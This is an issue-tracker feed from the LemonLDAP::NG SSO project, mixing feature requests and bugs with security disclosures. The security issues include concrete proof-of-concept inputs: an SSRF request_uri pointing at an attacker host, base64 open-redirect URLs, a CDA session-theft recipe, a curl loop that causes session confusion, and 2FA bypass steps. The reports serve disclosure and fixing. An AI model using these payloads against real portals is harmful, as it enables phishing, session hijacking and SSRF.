lemonldap-ng issueshttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues2023-10-10T15:11:24Zhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2993Add value filtering to 2F::Register::Generic2023-10-10T15:11:24ZMaxime BessonAdd value filtering to 2F::Register::Generic### Summary
Currently, it's not possible to force generic registrable 2F (email, sms, etc..) to follow a syntax rule (valid phone number, etc).
### Design proposition
* We need to implement a regex check for registrable info, and che...### Summary
Currently, it's not possible to force generic registrable 2F (email, sms, etc..) to follow a syntax rule (valid phone number, etc).
### Design proposition
* We need to implement a regex check for registrable info, and check it on the server side
* The error message needs to be customizable
* An invalid value should not be fatal (cancel the whole registration process)
* Optionally, also implement a JS check?2.18.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3000Implement continuations in the portal login flow2023-10-10T13:31:15ZMaxime BessonImplement continuations in the portal login flow### Summary
The LemonLDAP::NG portal is centered around the idea of running a list of methods (with `do`) in order.
(extractFormInfo, getUser, etc)
But this flow generally needs to be interrupted at some point for user interaction:
*...### Summary
The LemonLDAP::NG portal is centered around the idea of running a list of methods (with `do`) in order.
(extractFormInfo, getUser, etc)
But this flow generally needs to be interrupted at some point for user interaction:
* Entering credentials
* Entering 2FA
* Showing notifications
* Showing info
* etc.
Each component of LemonLDAP::NG has its own way of doing that. Generally a OneTimeToken is used, but not always.
* Issuer saves the request environment
* 2FA saves sessionInfo + a couple other fields
* Notifications encrypt the session cookie but require $req->data->{url} to be persisted
* etc.
There are literally dozens of bugs, maybe more, caused by the fact that the
current `$req` object needs to be serialized before the interaction and
restored after, and this is done incorrectly.
There are many bugs caused by interactions that arise for the fact that some
early part of the processing sets something in `$req->data` that is needed
later, but not restored correctly.
There are also many bugs caused by the fact that some extra steps are stored in
`$req->steps` but not restored after an interaction.
### Design proposition
We need to create a generic system for storing the request state during a user
interaction, including `$req->steps`. This system should be used by every part
of LemonLDAP::NG that needs to interrupt the current flow to display a page.
I will update this issue with a design proposal later, but it will take a lot
of time to implement this correctly, and require many preliminary steps.Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2896[Security][CVE-2023-28862] AuthBasic does not handle failure correctly2023-10-08T16:40:55ZMaxime Besson[Security][CVE-2023-28862] AuthBasic does not handle failure correctly### Concerned version
Version: 2.0.16
### Summary
The AuthBasic handler works like this:
* It computes a sessionid from login+password
* If sessionid already exists in the session DB, authenticate user
* Else, try to create the corr...### Concerned version
Version: 2.0.16
### Summary
The AuthBasic handler works like this:
* It computes a sessionid from login+password
* If sessionid already exists in the session DB, authenticate user
* Else, try to create the corresponding session by sending the login+pass to the portal RESTServer plugin
However, the only required step in the login flow is `store`, if anything happens after the`store` step, AuthBasic will succeed because the fixed-id session has been successfully created, which means:
* Accounts that are supposed to be 2FA-protected are not 2FA protected when AuthBasic is used
* If a 2FA module returns an error, the *first* AuthBasic request will 401, but the *second* AuthBasic request will work correctly => *VERY CONFUSING*
* Any plugin that tries to deny session *after* the `store` step will not deny AuthBasic sessions
This is probably a security issue
### Possible fixes
If the AuthBasic login process fails (not PE_OK), we need to remove the session created by `store` and return an error
This will cause a regression: users who relied on AuthBasic working for 2FA protected account will now see failures
Possible solution: use an env variable in 2FA activation rules if desired:
```
has2f("TOTP") and not $env->{"AuthBasic"}
```
or something of that sort2.16.1Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2250[CVE-2020-16093] Peer certificate not checked when using LDAPS2023-10-08T16:40:55ZMaxime Besson[CVE-2020-16093] Peer certificate not checked when using LDAPS### Environment
LemonLDAP::NG version: 2.0.8
Operating system: Debian 10
### Summary
* Configure a `ldaps://` URL as `ldapServer`
* Setup a self signed certificate on the LDAP server
* It works
* (It should not work.)
### Possible f...### Environment
LemonLDAP::NG version: 2.0.8
Operating system: Debian 10
### Summary
* Configure a `ldaps://` URL as `ldapServer`
* Setup a self signed certificate on the LDAP server
* It works
* (It should not work.)
### Possible fixes
Net::LDAP is insecure by default, at least on Debian Buster. We should explicitely pass `verify => require` when initializing it.
Fixing this is probably going to break a lot of installs. We need to create a new option for this and add a warning to release notes.2.0.9Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2970Provide all applications informations trought REST service GET /myapplications2023-10-02T14:26:58ZClément OUDOTProvide all applications informations trought REST service GET /myapplicationsWe should add tooltip, icon/svg icon, in the REST services which returns the application list
Linked to https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2853We should add tooltip, icon/svg icon, in the REST services which returns the application list
Linked to https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/28532.17.0Clément OUDOTClément OUDOThttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2998[Security:low][CVE-2023-44469] SSRF vulnerability in OIDC SSO2023-09-29T08:40:43ZMike Lorang[Security:low][CVE-2023-44469] SSRF vulnerability in OIDC SSO### Affected version
Version: lemonldap-ng 2.16.2-1
Platform: Apache
### Summary
The vulnerability is very similar to other implementations of OIDC.
The SSRF occurs, when changing the request_uri parameter in the url.
Here is a blog...### Affected version
Version: lemonldap-ng 2.16.2-1
Platform: Apache
### Summary
The vulnerability is very similar to other implementations of OIDC.
The SSRF occurs, when changing the request_uri parameter in the url.
Here is a blogpost describing similar issues in other implementations:
https://security.lauritz-holtmann.de/post/sso-security-ssrf/
### Details
Here is the GET request in detail:
```
GET /oauth2/authorize?client_id=<redacted>&nonce=<redacted>&redirect_uri=<redacted>&response_type=code&scope=openid%20profile%20email&state=<redacted>&request_uri=https://attacker_url.com/requesturi.jwt HTTP/1.1
Host: auth.sso.domain.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.int.govcert.etat.lu/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Authorization: Negotiate
<some base64 redacted>
Cookie: lemonldappdata=<redacted>
```
A request containing the parameter request_uri set to an arbitrary URL value https://attacker_url.com/requesturi.jwt was sent to the OpenID Authorization Server. As consequence the OpenID Provider interacts with the remote attacker server listening on the specified URL demonstrating that it is vulnerable to SSRF blind issues.
### Possible fixes
For security reasons the URI value of request_uri parameter should be carefully validated at server-side, otherwise an attacker could be able to lead the OpenID Provider to interact with an arbitrary server under is control and then potentially exploit SSRF vulnerabilities. It is advisable to define a strict whitelist of allowed URI values (pre-registered during the OpenID client registration process) for the request_uri parameter.2.17.1Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3003[Security:low] Open redirection when OIDC RP isn't configured with redirectio...2023-09-25T14:46:11ZYadd[Security:low] Open redirection when OIDC RP isn't configured with redirection uriThis can't happen if configuration was modified using the manager _(a test filters this case)_.
The issue is: if this misconfiguration exists, LLNG follows redirection given in redirect_uri parameter.This can't happen if configuration was modified using the manager _(a test filters this case)_.
The issue is: if this misconfiguration exists, LLNG follows redirection given in redirect_uri parameter.2.17.1YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3001Conf::LDAP options in lemonldap-ng.ini overrides Auth options in portal2023-09-25T09:57:06ZMaxime BessonConf::LDAP options in lemonldap-ng.ini overrides Auth options in portal### Affected version
Version: 2.17.0
### Summary
* Define a LDAP server for configuration storage
* Use a different LDAP server (AD) for Auth
* Auth is performed against the configuration LDAP server :x:
### Logs
```
[debug] Proce...### Affected version
Version: 2.17.0
### Summary
* Define a LDAP server for configuration storage
* Use a different LDAP server (AD) for Auth
* Auth is performed against the configuration LDAP server :x:
### Logs
```
[debug] Processing getUser
[debug] Try to build new LDAP connection with: ldap://ldap-config
[error] Error when binding to LDAP server: Invalid credentials
```
### Possible fixes
This is a regression caused by be157d5de17116d9bdcd25462676d399d9bf0559
we should roll back the fixes for #2711 and try to find a better solution
I think this issue might affect a decent number of users, a 2.17.1 may be justified2.17.1Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2832[Security:medium] Redirection URL validation bypass using credentials in URL2023-09-22T14:13:30ZClément OUDOT[Security:medium] Redirection URL validation bypass using credentials in URLAn attacker can forge a redirection on a malicious site using a fake credentials in URL value.
Example:
* Portal : https://auth.openid.club
* Allowed application : https://test1.openid.club
* Malicious site : https://google.fr
* Malicio...An attacker can forge a redirection on a malicious site using a fake credentials in URL value.
Example:
* Portal : https://auth.openid.club
* Allowed application : https://test1.openid.club
* Malicious site : https://google.fr
* Malicious URL : https://test1.openid.club:test@google.fr
* Malicious URL base 64 : aHR0cHM6Ly90ZXN0MS5vcGVuaWQuY2x1Yjp0ZXN0QGdvb2dsZS5mcgo=
* Malicious redirection trigger : https://auth.openid.club/?url=aHR0cHM6Ly90ZXN0MS5vcGVuaWQuY2x1Yjp0ZXN0QGdvb2dsZS5mcgo=2.0.16Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2931[Security:medium] open redirection due to incorrect escape handling in URI us...2023-09-22T14:13:30ZMaxime Besson[Security:medium] open redirection due to incorrect escape handling in URI userinfo### Concerned version
Version: 2.16.2
### Summary
* Browse to http://auth.example.com/?url=aHR0cHM6Ly9oYWNrZXIuY29tXEBAdGVzdDEuZXhhbXBsZS5jb20v (https://hacker.com\@@test1.example.com/)
* LLNG detects it as test1.example.com, which is...### Concerned version
Version: 2.16.2
### Summary
* Browse to http://auth.example.com/?url=aHR0cHM6Ly9oYWNrZXIuY29tXEBAdGVzdDEuZXhhbXBsZS5jb20v (https://hacker.com\@@test1.example.com/)
* LLNG detects it as test1.example.com, which is allowed, and sends redirect
* For some reason, browsers "correct" it to https://hacker.com/@@test1.example.com/
### Possible fixes
We should normalize the received URL before using it in redirects:
```perl
my $u = URI->new('https://hacker.com\@@test1.example.com/');
print $u; # https://hacker.com%5C@@test1.example.com
```2.17.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2535[security:low] Incorrect regexp construction in isTrustedUrl lets attacker st...2023-09-22T14:13:29ZMaxime Besson[security:low] Incorrect regexp construction in isTrustedUrl lets attacker steal session on CDA application### Concerned version
Version: 2.0.11
### Summary
* Configure a CDA vhost (cda.example.com)
* let attack_urldc = base64(http://your-untrusted-domain.com/?attack=http://cda.example.com)
* Trick your target into opening http://auth.lem...### Concerned version
Version: 2.0.11
### Summary
* Configure a CDA vhost (cda.example.com)
* let attack_urldc = base64(http://your-untrusted-domain.com/?attack=http://cda.example.com)
* Trick your target into opening http://auth.lemontest.lxd/?url=attack_url
* User is redirected to http://your-untrusted-domain.com/?attack=http://cda.example.com&lemonldapcda=CDA_CODE
* You may now login to http://cda.example.com?lemonldapcda=CDA_CODE as the target user
Example:
http://auth.example.com/?url=aHR0cDovL3BlcmR1LmNvbS8/ZmFrZT1odHRwOi8vY2RhLmV4YW1wbGUuY29tLw==
### Possible fixes
the trustedDomainsRe is missing a `^`, this is also the case in !185
This mistake causes trustedDomainsRe to be easily bypassed, but CDA is the feature which has the worst impact for this mistake2.0.12Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2611Plugin checkState, combination and Kerberos2023-09-22T14:13:29ZClément OUDOTPlugin checkState, combination and KerberosTrying to use checkstate plugin (https://lemonldap-ng.org/documentation/latest/checkstate.html) with a setup using combination Kerberos/LDAP
Using a bad username works (the check fails) but a valid username and a bad password works.
Lo...Trying to use checkstate plugin (https://lemonldap-ng.org/documentation/latest/checkstate.html) with a setup using combination Kerberos/LDAP
Using a bad username works (the check fails) but a valid username and a bad password works.
Logs just say authentication is valid:
```
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Check configuration for Lemonldap::NG::Handler::PSGI::Main
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Get configuration from cache without verification.
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Lemonldap::NG::Handler::PSGI::Main: configuration is up to date
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [info] No cookie found
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Build URL https://auth.example.com/checkstate?secret=secret&user=coudot&password=test
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Redirect 1.1.1.1 to portal (url was /checkstate?secret=secret&user=coudot&password=test)
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] User not authenticated, Try in use, cancel redirection
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Start routing checkstate
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing controlUrl
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing code ref
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing code ref
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Launching ::Issuer::SAML::storeEnv
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing getUser
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] Processing authenticate
[Thu Sep 9 17:25:08 2021] [LLNG:60228] [debug] -> authResult = 0
```
But no Kerberos ticket is sent here.In discussionClément OUDOTClément OUDOThttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2539[security:high, CVE-2021-35472] session cache corruption can lead to authoriz...2023-09-22T14:13:29ZChristophe Maudouxchrmdx@gmail.com[security:high, CVE-2021-35472] session cache corruption can lead to authorization bypass or spoofing### Concerned version
Version: %2.0.0 to %2.0.11
Platform: Nginx/uWSGI
### Summary
- Enable Impersonation plugin
- Enable REST Session server
- Disable CSRF tokens
- Start a terminal and execute :
for i in {1..1000}; do curl -X POST ...### Concerned version
Version: %2.0.0 to %2.0.11
Platform: Nginx/uWSGI
### Summary
- Enable Impersonation plugin
- Enable REST Session server
- Disable CSRF tokens
- Start a terminal and execute :
for i in {1..1000}; do curl -X POST -H 'Accept:application/json' -d user=msmith --data-urlencode password='msmith' http://auth.example.com:19876;done
- make reload
- Login dwho/dwho/dwho and hit F5 to refresh Portal
- Alternatively authenticated as 'dwho' or 'msmith'
### Backends used
PG![vokoscreen-2021-06-08_22-12-00](/uploads/0f9e1505bbbf02384be054e46f27c941/vokoscreen-2021-06-08_22-12-00.mp4)
### Possible fixes
Seems issue is linked to handler internal cache.
Login with 'dwho' / 'dwho'
Enable Impersonation plugin -> make reload_web_server
Start bash loop, hit F5 and session switches to 'msmith'
Stop bash loop and session is back to 'dwho' after 10/15 seconds..;2.0.12YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2543[security:low] 2FA bypass with sfOnlyUpgrade and totp2fDisplayExistingSecret2023-09-22T14:13:29ZMaxime Besson[security:low] 2FA bypass with sfOnlyUpgrade and totp2fDisplayExistingSecret### Concerned version
Version: 2.0.11
### Summary
* Configure "Use 2FA for session upgrade"
* Configure TOTP with "Display existing secret" enabled
* Steal a user's password and login with it
* Go to 2FA manager, click TOTP
* Scan the...### Concerned version
Version: 2.0.11
### Summary
* Configure "Use 2FA for session upgrade"
* Configure TOTP with "Display existing secret" enabled
* Steal a user's password and login with it
* Go to 2FA manager, click TOTP
* Scan the user's existing TOTP to your own device, and profit.
on backends
### Possible fixes
Either
* Remove the ability to display existing 2FA secrets
Or
* Protect existing secret from being displayed when current authentication level is too low
Depending on #25412.0.12Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2477[security:low] Wildcard in virtualhost allows being redirected to untrusted d...2023-09-22T14:13:29ZAndreas Deschka[security:low] Wildcard in virtualhost allows being redirected to untrusted domainsOne of our users has reported to us the following security problem, which could be used for phishing.
In Lemonldap 2.0.10 when you create a virtual host with a wildcard, for example `*.subdomain.local.test`, an attacker can forward user...One of our users has reported to us the following security problem, which could be used for phishing.
In Lemonldap 2.0.10 when you create a virtual host with a wildcard, for example `*.subdomain.local.test`, an attacker can forward users to every domain by using specially designed urls.
Target url: `https://google.com#abc.subdomain.local.test/` (The slash at the end is important.)
Base64 encoded: `aHR0cHM6Ly9nb29nbGUuY29tI2FiYy5zdWJkb21haW4ubG9jYWwudGVzdC8=`
Url which the user clicks on (looks like it is safe to use): `https://myportal.local.test/url=aHR0cHM6Ly9nb29nbGUuY29tI2FiYy5zdWJkb21haW4ubG9jYWwudGVzdC8=`
User will now get redirected to `https://google.com#abc.subdomain.local.test`
I checked if cda is also affected, but from what I saw, it seems to be not. (We anyway do not have it activated.) The following line always rejects correctly:
https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/blob/v2.0/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/CDA.pm#L29
I have no problems, with publishing this issue, when you do not have anything against it.
I used chrome version 88.0.4324.192 for testing.2.0.12YaddYaddhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2495[security:medium] XSS on register form2023-09-22T14:13:29ZClément OUDOT[security:medium] XSS on register formIn register form, we do not check XSS attack before registering data into session:
```perl
# Use submitted value
$req->data->{registerInfo}->{mail} = $req->param('mail');
$req->data->{registerInfo}->{firstnam...In register form, we do not check XSS attack before registering data into session:
```perl
# Use submitted value
$req->data->{registerInfo}->{mail} = $req->param('mail');
$req->data->{registerInfo}->{firstname} = $req->param('firstname');
$req->data->{registerInfo}->{lastname} = $req->param('lastname');
$req->data->{registerInfo}->{ipAddr} = $req->address;
```
This allow to inject HTML code in form that will be displayed in mail for the end user, and can lead to malicious information (redirection on a hacker's site).
We should check for XSS before registering data, for example:
```perl
# Check input
if ( $self->p->checkXSSAttack('mail', $req->param('mail') ) or $self->p->checkXSSAttack('firstname', $req->param('firstname') ) or $self->p->checkXSSAttack('lastname', $req->param('lastname') ) ) {
$self->logger->error("XSS on Register form");
return PE_MALFORMEDUSER;
}
# Use submitted value
$req->data->{registerInfo}->{mail} = $req->param('mail');
$req->data->{registerInfo}->{firstname} = $req->param('firstname');
$req->data->{registerInfo}->{lastname} = $req->param('lastname');
$req->data->{registerInfo}->{ipAddr} = $req->address;
```
A review on all public form should be done to check we have on other issues.2.0.12Clément OUDOTClément OUDOThttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2946userControl regexp is not applied by authSlave2023-09-22T13:59:59ZChristophe Maudouxchrmdx@gmail.comuserControl regexp is not applied by authSlave### Affected version
Version: All
Platform: All
Slave authentication module can submit an unvalid login### Affected version
Version: All
Platform: All
Slave authentication module can submit an unvalid login2.17.0Christophe Maudouxchrmdx@gmail.comChristophe Maudouxchrmdx@gmail.comhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/3010oidcServiceAllowOnlyDeclaredScopes option drop offline_access scope2023-09-20T09:26:16ZYaddoidcServiceAllowOnlyDeclaredScopes option drop offline_access scope2.17.1https://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2711Cannot override configuration in lemonldap-ng.ini when value is "0"2023-09-20T09:03:18ZMaxime BessonCannot override configuration in lemonldap-ng.ini when value is "0"### Concerned version
Version: 2.0.14
### Summary
* In config, set `portalDisplayRegister=1`
* In lemonldap-ng.ini, set `portalDisplayRegister=0`
* Expected: Register button is not displayed
* Actual: Register button is displayed
##...### Concerned version
Version: 2.0.14
### Summary
* In config, set `portalDisplayRegister=1`
* In lemonldap-ng.ini, set `portalDisplayRegister=0`
* Expected: Register button is not displayed
* Actual: Register button is displayed
### Logs
In portal `reloadConf`:
* `$conf` is configuration from backend
```
%{ $self->{conf} } = %{ $self->localConfig };
...
# Load conf in portal object
foreach my $key ( keys %$conf ) {
$self->{conf}->{$key} ||= $conf->{$key};
}
```
### Possible fixes
* `||=` should probably be `//=`
* Side effects ?
* Perhaps localConf should be loaded info `$self->{conf}` after `$conf` ?
* Does this happen elsewhere?2.17.0Maxime BessonMaxime Bessonhttps://gitlab.ow2.org/lemonldap-ng/lemonldap-ng/-/issues/2996Invalid URL for application logo in myapplications web service2023-09-15T13:46:19ZClément OUDOTInvalid URL for application logo in myapplications web serviceThe logo URL returned by /myapplications is malformed: `http:/auth.example.com//static/common/apps/demo.png`. There is a missing `/` after `http:`.
The bug was introduced in commit 6fde3a06502c0fb13375830e5e9b0ebb21c6692b
The associate...The logo URL returned by /myapplications is malformed: `http:/auth.example.com//static/common/apps/demo.png`. There is a missing `/` after `http:`.
The bug was introduced in commit 6fde3a06502c0fb13375830e5e9b0ebb21c6692b
The associated unit test is wrong, as it test the malformed value:
```
ok(
$res->{myapplications}->[0]->{Applications}->[0]->{'Application Test 1'}
->{AppLogo} eq 'http:/auth.example.com//static/common/apps/demo.png',
' Logo app1 found'
);
```
Commenting the last regexp on basePath is enough to fix the problem:
```
diff --git a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
index f5b760e1c..cb8b88155 100644
--- a/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
+++ b/lemonldap-ng-portal/lib/Lemonldap/NG/Portal/Plugins/RESTServer.pm
@@ -788,7 +788,7 @@ sub myApplications {
my $basePath = $self->conf->{portal};
$basePath =~ s#/*$#/#;
$basePath .= $self->p->{staticPrefix} . '/common/apps/';
- $basePath =~ s#//+#/#;
+ #$basePath =~ s#//+#/#;
my @appslist = map {
my @apps = map {
{
```
A better solution might be found.2.17.1Clément OUDOTClément OUDOT